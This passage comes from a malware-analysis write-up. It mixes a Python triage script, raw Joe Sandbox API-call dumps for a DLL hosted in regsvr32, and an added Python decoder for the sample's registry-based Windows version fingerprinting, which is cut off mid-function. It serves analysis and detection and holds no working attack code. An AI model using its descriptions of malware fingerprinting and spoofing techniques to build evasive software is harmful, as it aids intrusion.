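• Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
"""

SAMPLE_RECV = """\
• recv.WS2_32(?,?,00000598,00000000), ref: 02633C9F
• SetLastError.KERNEL32(00000000,?,00000001,?,02633AB7), ref: 02633CDA
• GetLastError.KERNEL32 ref: 02633D25
• WSAGetLastError.WS2_32(?,00000001,?,02633AB7), ref: 02633D5B
• WSASetLastError.WS2_32(0000000D,?,00000001,?,02633AB7), ref: 02633D82
Memory Dump Source
• Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
"""

# Constructed line (not from the report): what a resolved parent-process attribute looks like.
SAMPLE_RESOLVED = "• UpdateProcThreadAttribute.KERNEL32(00A3F000,00000000,00020000,00A3F1C0,00000004,00000000,00000000), ref: 00401000\n"

if __name__ == "__main__":
    for sample in (SAMPLE_PROC_ATTR, SAMPLE_RECV, SAMPLE_RESOLVED):
        for finding in triage(parse_block(sample)):
            print(finding)
```

The `?` placeholders come straight from the report and mean Joe Sandbox could not resolve that stack slot, so the parser carries them through rather than guessing; any rule that needs a concrete argument (like the attribute value) degrades to "unresolved" instead of reporting a spoofing technique the dump does not prove.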
                                                                  APIs
                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 02634064
                                                                    • Part of subcall function 02631420: HeapFree.KERNEL32(?,00000000,?,?,?,026340A1,?,00000000,02634029,?,02645054,02633628), ref: 0263143D
                                                                    • Part of subcall function 02631420: _free.LIBCMT ref: 02631459
                                                                  • HeapDestroy.KERNEL32(?,?,00000000,02634029,?,02645054,02633628), ref: 026340A9
                                                                  • HeapCreate.KERNEL32(?,?,?,?,00000000,02634029,?,02645054,02633628), ref: 026340C4
                                                                  • SetEvent.KERNEL32(?,?,00000000,02634029,?,02645054,02633628), ref: 02634140
                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 02634147
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CriticalSection$CreateDestroyEnterEventFreeLeave_free
                                                                  • String ID:
                                                                  • API String ID: 1767077271-0
                                                                  • Opcode ID: 4a3da7fb678c79a6339a377ee68fef72df8bff35a4f9b6ffb2c68e72344071ae
                                                                  • Instruction ID: db54e0bcd3646886469acae9f6f3ddb8b6a1389f444473de004e4230ef1c87db
                                                                  • Opcode Fuzzy Hash: 4a3da7fb678c79a6339a377ee68fef72df8bff35a4f9b6ffb2c68e72344071ae
                                                                  • Instruction Fuzzy Hash: EC312678600A46AFD705DB78C898BAAF7E9FF48310F148659E42AC7250CB35B865CFD0
                                                                  APIs
                                                                  • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA114,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD87C
                                                                  • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA11C,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8BA
                                                                  • WakeByAddressAll.API-MS-WIN-CORE-SYNCH-L1-2-0(6C9CA118,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8CE
                                                                  • TlsSetValue.KERNEL32(00000000,00000001,00000000,00000000,?,6C98426C,00000024,6C984290,00000000,?,6C8EA257,6C9CA118,00000000), ref: 6C8FD8FE
                                                                  • TlsSetValue.KERNEL32(00000000,00000000,6C8EA257,6C9CA118,00000000), ref: 6C8FD913
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressWake$SingleValue
                                                                  • String ID:
                                                                  • API String ID: 1317188499-0
                                                                  • Opcode ID: 8f14fa707657847e121040e1bd8e8b4f193dc0c83e4907926c9ef6c0f4f6b3f6
                                                                  • Instruction ID: 4fd76a15b389ebfee826f4da9d0b7d3cbc68015c93f3ee927945eec09c57481a
                                                                  • Opcode Fuzzy Hash: 8f14fa707657847e121040e1bd8e8b4f193dc0c83e4907926c9ef6c0f4f6b3f6
                                                                  • Instruction Fuzzy Hash: E51136303041296BDB261E559900BD673A89F4936EF108C3EF75EDBA80CF20A44387C5
                                                                  APIs
                                                                  • VariantToPropVariant.PROPSYS(?), ref: 6C892EED
                                                                  • PropVariantToBSTR.PROPSYS(?,00000000), ref: 6C892F2C
                                                                  • PropVariantClear.OLE32(?), ref: 6C892F56
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 6C892F83
                                                                  • PropVariantClear.OLE32(?), ref: 6C892F89
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                   • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                   • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Prop$Clear$FreeString
                                                                  • String ID:
                                                                  • API String ID: 2508621922-0
                                                                  • Opcode ID: 63a484797ddb0f828f98ce2d9f9b8e43d88344ee41d09c571d9cc26e6d5aac0e
                                                                  • Instruction ID: 361cdcdef94d9a3af7f617353998706ee0e7b120ba7837d687052bd8e166b0f6
                                                                  • Opcode Fuzzy Hash: 63a484797ddb0f828f98ce2d9f9b8e43d88344ee41d09c571d9cc26e6d5aac0e
                                                                  • Instruction Fuzzy Hash: A321AFB19087459BD720CF29C944A9BF7F8FFA8214F008A2EF499A7610E770D5458752
                                                                  APIs
                                                                  • _malloc.LIBCMT ref: 0263E625
                                                                    • Part of subcall function 02637043: __FF_MSGBANNER.LIBCMT ref: 0263705C
                                                                    • Part of subcall function 02637043: __NMSG_WRITE.LIBCMT ref: 02637063
                                                                    • Part of subcall function 02637043: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 02637088
                                                                  • _free.LIBCMT ref: 0263E638
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free_malloc
                                                                  • String ID:
                                                                  • API String ID: 1020059152-0
                                                                  • Opcode ID: 917929ce2ead8fdfb053d0a4a5c2090d309fdc116ca0e1980830da503adefb97
                                                                  • Instruction ID: a3d6ecb74598aee861a2637182da48e84d9dda5dc91afeeb81097a707c7d9c50
                                                                  • Opcode Fuzzy Hash: 917929ce2ead8fdfb053d0a4a5c2090d309fdc116ca0e1980830da503adefb97
                                                                  • Instruction Fuzzy Hash: 27110676C40611ABCB232F74A80475D7B96AF52361B344929F8959B240DF36C4918FA8
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                  • String ID:
                                                                  • API String ID: 955811338-0
                                                                  • Opcode ID: 77de361b4cd7367567e0d369d8c6b3654e3291b6ddb4abbe59ddb5ccefd4c70a
                                                                  • Instruction ID: b3e0c26f206c535069aa5479246ba1a94883e162a854a351ffe795af295bbc92
                                                                  • Opcode Fuzzy Hash: 77de361b4cd7367567e0d369d8c6b3654e3291b6ddb4abbe59ddb5ccefd4c70a
                                                                  • Instruction Fuzzy Hash: 4911E532604706AFEB10BFA5EC40E9B7BE9EF84768720002DF9149E151DB71F40387A1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: _lock_unlockcalloc
                                                                  • String ID:
                                                                  • API String ID: 3876498383-0
                                                                  • Opcode ID: ab13595c569d6116c3506e4665726baeaa60c1a24c9c98289cb0a5977b08b006
                                                                  • Instruction ID: b012cf26fb7ca6a5577a487856e1fa49046956c5866d9a1b44473705fd3572fd
                                                                  • Opcode Fuzzy Hash: ab13595c569d6116c3506e4665726baeaa60c1a24c9c98289cb0a5977b08b006
                                                                  • Instruction Fuzzy Hash: A61119702452118FD700EF68C88075ABBE4FF95394F15C669D898DB785EB34D848CBA2
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: String$memcmp
                                                                  • String ID:
                                                                  • API String ID: 2223658989-0
                                                                  • Opcode ID: 3181424c49076631bd1776d0c5497c08c48a04e7cc7cfef1ad3c5c21fed26948
                                                                  • Instruction ID: c5531d0a0da7b1bfc093e0703853b3943ee84250a98520b739cdd46db2849290
                                                                  • Opcode Fuzzy Hash: 3181424c49076631bd1776d0c5497c08c48a04e7cc7cfef1ad3c5c21fed26948
                                                                  • Instruction Fuzzy Hash: FF01D6B3B013146BEB209D7E8C84AAB7BDCAF59278B054874EC08E7701E739CC0482E0
                                                                  APIs
                                                                  • __CreateFrameInfo.LIBCMT ref: 04F93D70
                                                                    • Part of subcall function 04F93900: __getptd.LIBCMT ref: 04F9390E
                                                                    • Part of subcall function 04F93900: __getptd.LIBCMT ref: 04F9391C
                                                                  • __getptd.LIBCMT ref: 04F93D7A
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F93D88
                                                                  • __getptd.LIBCMT ref: 04F93D96
                                                                  • __getptd.LIBCMT ref: 04F93DA1
                                                                    • Part of subcall function 04F939A5: __CallSettingFrame@12.LIBCMT ref: 04F939F1
                                                                    • Part of subcall function 04F93E6E: __getptd.LIBCMT ref: 04F93E7D
                                                                    • Part of subcall function 04F93E6E: __getptd.LIBCMT ref: 04F93E8B
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 3282538202-0
                                                                  • Opcode ID: 78a2e994d0c7bf30a9674184c11b94725c17fdf72b8fda81513464e831a267d6
                                                                  • Instruction ID: 74a0609f49e9422fafbb53cc33540276d8201df1c054a41e37d584f3f69af4d8
                                                                  • Opcode Fuzzy Hash: 78a2e994d0c7bf30a9674184c11b94725c17fdf72b8fda81513464e831a267d6
                                                                  • Instruction Fuzzy Hash: 7711DA71D0020ADFEF00EFA4D944B9D7BF1FF08318F10816AE814AB250DB38AA569F54
                                                                  APIs
                                                                  • __CreateFrameInfo.LIBCMT ref: 0264369B
                                                                    • Part of subcall function 0264322B: __getptd.LIBCMT ref: 02643239
                                                                    • Part of subcall function 0264322B: __getptd.LIBCMT ref: 02643247
                                                                  • __getptd.LIBCMT ref: 026436A5
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 026436B3
                                                                  • __getptd.LIBCMT ref: 026436C1
                                                                  • __getptd.LIBCMT ref: 026436CC
                                                                    • Part of subcall function 026432D0: __CallSettingFrame@12.LIBCMT ref: 0264331C
                                                                    • Part of subcall function 02643799: __getptd.LIBCMT ref: 026437A8
                                                                    • Part of subcall function 02643799: __getptd.LIBCMT ref: 026437B6
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd$CallCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                  • String ID:
                                                                  • API String ID: 3282538202-0
                                                                  • Opcode ID: ec3543f510356637c08229af0eb5953e989d91e34794377bc36418f8843f716b
                                                                  • Instruction ID: 0112794fd901d60c151d76c3e74101d71bad123a6e2ad8f75526c8a82a36050c
                                                                  • Opcode Fuzzy Hash: ec3543f510356637c08229af0eb5953e989d91e34794377bc36418f8843f716b
                                                                  • Instruction Fuzzy Hash: 951149B1C05209DFDB01EFA4D884BEE7BF1FF04310F5481A9E854A7250DBB89A119F94
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(02645EB4,02647C00,00000008,02639A0E,00000000,00000000,?,0263A0B0,?,00000001,?,?,0263C10B,00000018,02647C70,0000000C), ref: 02639917
                                                                  • __lock.LIBCMT ref: 0263994B
                                                                    • Part of subcall function 0263C180: __mtinitlocknum.LIBCMT ref: 0263C196
                                                                    • Part of subcall function 0263C180: __amsg_exit.LIBCMT ref: 0263C1A2
                                                                    • Part of subcall function 0263C180: RtlEnterCriticalSection.NTDLL(?), ref: 0263C1AA
                                                                  • InterlockedIncrement.KERNEL32(02649720), ref: 02639958
                                                                  • __lock.LIBCMT ref: 0263996C
                                                                  • ___addlocaleref.LIBCMT ref: 0263998A
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 637971194-0
                                                                  • Opcode ID: f5b094b5ba4cddfb46deb40ab861446f93bd0bc04dff94238ecc9614fc4e572d
                                                                  • Instruction ID: 34e4b71838977f7f2fade6259f0e577be2143d2ef694b0e688959e7d8ca4be9a
                                                                  • Opcode Fuzzy Hash: f5b094b5ba4cddfb46deb40ab861446f93bd0bc04dff94238ecc9614fc4e572d
                                                                  • Instruction Fuzzy Hash: 5A01C071845B00EFE721AF65C90474AFBE1EF60326F10894EE4D697390CBB0A640CF59
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 04F8E861
                                                                    • Part of subcall function 04F8A108: __getptd_noexit.LIBCMT ref: 04F8A10B
                                                                    • Part of subcall function 04F8A108: __amsg_exit.LIBCMT ref: 04F8A118
                                                                  • __getptd.LIBCMT ref: 04F8E878
                                                                  • __amsg_exit.LIBCMT ref: 04F8E886
                                                                  • __lock.LIBCMT ref: 04F8E896
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 04F8E8AA
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918694072.0000000004F80000.00000040.00000020.00020000.00000000.sdmp, Offset: 04F80000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_4f80000_regsvr32.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: e1ecb88f92b0842774c6f29bde77af3f72ff2c3df1475626632d6863d63b8cab
                                                                  • Instruction ID: 7012d96c4b1e826b4dbd506b0ef32b12ab476e80a14f1f984ac9da1f73857ff4
                                                                  • Opcode Fuzzy Hash: e1ecb88f92b0842774c6f29bde77af3f72ff2c3df1475626632d6863d63b8cab
                                                                  • Instruction Fuzzy Hash: 3AF06D32E84A18AAFB24BB64AC0574E3BA0EF00728F10411ED510AF1C0CB647843CA56
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 0263E18C
                                                                    • Part of subcall function 02639A33: __getptd_noexit.LIBCMT ref: 02639A36
                                                                    • Part of subcall function 02639A33: __amsg_exit.LIBCMT ref: 02639A43
                                                                  • __getptd.LIBCMT ref: 0263E1A3
                                                                  • __amsg_exit.LIBCMT ref: 0263E1B1
                                                                  • __lock.LIBCMT ref: 0263E1C1
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0263E1D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2916891483.0000000002631000.00000020.10000000.00040000.00000000.sdmp, Offset: 02631000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_2631000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: 4d39e369051f6f564bf6d3440415ab8c672199f938604d9dc2dd8ba514a51de1
                                                                  • Instruction ID: 791a33e9b83eeb4076e69ce8fb3a200329dbefb06ad0c238da8a710a20b565b8
                                                                  • Opcode Fuzzy Hash: 4d39e369051f6f564bf6d3440415ab8c672199f938604d9dc2dd8ba514a51de1
                                                                  • Instruction Fuzzy Hash: 00F0BE32D8A710DBE72BBBB49801B5E73E2AF00725F14420EE451A73C0CFA55542CEAD
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID: CriticalTripPoint$CurrentTemperature
                                                                  • API String ID: 1473721057-3920528518
                                                                  • Opcode ID: dbace2a264522963a30bb2e1dd280f85fd375d8b36585dba9ba9da48cdf51b50
                                                                  • Instruction ID: 7d27e77d01399446d767893627752b35b919108b9d9dd9d444be19bc1da23a44
                                                                  • Opcode Fuzzy Hash: dbace2a264522963a30bb2e1dd280f85fd375d8b36585dba9ba9da48cdf51b50
                                                                  • Instruction Fuzzy Hash: A6A1B2B19083009BD714CE2AC949B9BF7E9AFC4348F048E3DF59597A90E779E548CB42
                                                                  APIs
                                                                    • Part of subcall function 6C87CC70: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,00000001), ref: 6C87CCEA
                                                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 6C87C4CA
                                                                  • RegQueryValueExW.ADVAPI32(00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C539
                                                                  • RegCloseKey.ADVAPI32(?,00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C57E
                                                                    • Part of subcall function 6C89A890: GetErrorInfo.OLEAUT32(00000000,00000000,00000000,?,?,6C8768BC,00000000,?,0000003C,00000000), ref: 6C89A8A5
                                                                  Strings
                                                                  • ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 6C87C45D
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.2918930947.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                  • Associated: 00000007.00000002.2918891880.000000006C850000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919021980.000000006C954000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919055650.000000006C955000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919135650.000000006C9CA000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919170123.000000006C9CB000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919206104.000000006C9CC000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919258466.000000006C9CD000.00000008.00000001.01000000.00000007.sdmp
                                                                  • Associated: 00000007.00000002.2919294205.000000006C9D1000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_6c850000_regsvr32.jbxd
                                                                  Similarity
                                                                  • API ID: Open$CloseErrorInfoQueryValue
                                                                  • String ID: ProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                  • API String ID: 2599130380-3947172187
                                                                  • Opcode ID: 3f2c71bea10582427bfdbfa0ba810ec00d6cb9b347dc3a07f81bb02947771d8f
                                                                  • Instruction ID: 0ebda0d0d712106e897b77c1f5dc6c3c889e81b96f886e93e7a75f592538cd8c
                                                                  • Opcode Fuzzy Hash: 3f2c71bea10582427bfdbfa0ba810ec00d6cb9b347dc3a07f81bb02947771d8f
                                                                  • Instruction Fuzzy Hash: 62614AB5D002089BEB20DFA4DA45BEEBBB8FF55308F144425E804BB641F775DE098BA0
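The RegOpenKeyExW / RegQueryValueExW / RegCloseKey sequence in the function above, taken together with its string set (ProductName, CurrentBuildNumber, CurrentMajorVersionNumber, "Windows 10", "Windows 11"), is an OS-version fingerprint read from the registry by the DLL hosted in regsvr32. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses the logged call lines as they appear in the report, decodes the hive handle (80000002) and the samDesired mask (00020019) against the winreg.h constants, and shows why a fingerprinter has to read all three values rather than ProductName alone. Assumptions, labelled in the code: the key name, which the report logs only as `?`, is taken to be HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion, and the registry values used as input are constructed, not taken from the sandbox run.

```python
"""Decode the registry calls logged by Joe Sandbox for the OS-fingerprint routine.

Added example; not part of the report or of the sample.  Assumed key
(the report shows the lpSubKey argument as '?'):
    HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion
"""
import re

# Predefined hive handles (winreg.h).
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
    0x80000005: "HKEY_CURRENT_CONFIG",
}

# Registry-specific rights plus the standard rights that KEY_READ pulls in.
KEY_RIGHTS = {
    0x000001: "KEY_QUERY_VALUE",
    0x000002: "KEY_SET_VALUE",
    0x000004: "KEY_CREATE_SUB_KEY",
    0x000008: "KEY_ENUMERATE_SUB_KEYS",
    0x000010: "KEY_NOTIFY",
    0x000020: "KEY_CREATE_LINK",
    0x000100: "KEY_WOW64_64KEY",
    0x000200: "KEY_WOW64_32KEY",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
}
# READ_CONTROL | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_READ = 0x20019

# One logged call: "Api.Module(arg,arg,...), ref: address"
CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")

# Lines copied verbatim from the report's API list for this function.
REPORT_LINES = [
    "• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?), ref: 6C87C4CA",
    "• RegQueryValueExW.ADVAPI32(00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C539",
    "• RegCloseKey.ADVAPI32(?,00000001,?,00000000,?,00000000,00000004,80000002,?,00000000,00020019,?), ref: 6C87C57E",
]


def parse_call(line):
    """Return {api, module, args, ref} for one logged call line, or None."""
    m = CALL_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    return {"api": api, "module": module,
            "args": [a.strip() for a in args.split(",")], "ref": ref}


def decode_access(mask):
    """Names of the access-right bits set in a samDesired mask."""
    return [name for bit, name in KEY_RIGHTS.items() if mask & bit]


def decode_regopen(call):
    """(hive name, rights, is exactly KEY_READ) for a RegOpenKeyEx* call."""
    hkey = int(call["args"][0], 16)
    sam = int(call["args"][3], 16)
    return HIVES.get(hkey, "handle 0x%08X" % hkey), decode_access(sam), sam == KEY_READ


def regquery_buffer_size(call):
    """cbData argument of RegQueryValueEx*: 4 bytes fits a REG_DWORD such as
    CurrentMajorVersionNumber; ProductName / CurrentBuildNumber are REG_SZ."""
    return int(call["args"][5], 16)


def windows_release(product_name, major, build):
    """Marketing release from the three CurrentVersion values.

    Windows 11 keeps ProductName 'Windows 10 ...' and CurrentMajorVersionNumber 10;
    only CurrentBuildNumber (22000 and above) tells it apart, which is why the
    string set pairs 'Windows 11' with CurrentBuildNumber.
    """
    if major is not None and int(major) == 10:
        return "Windows 11" if int(build) >= 22000 else "Windows 10"
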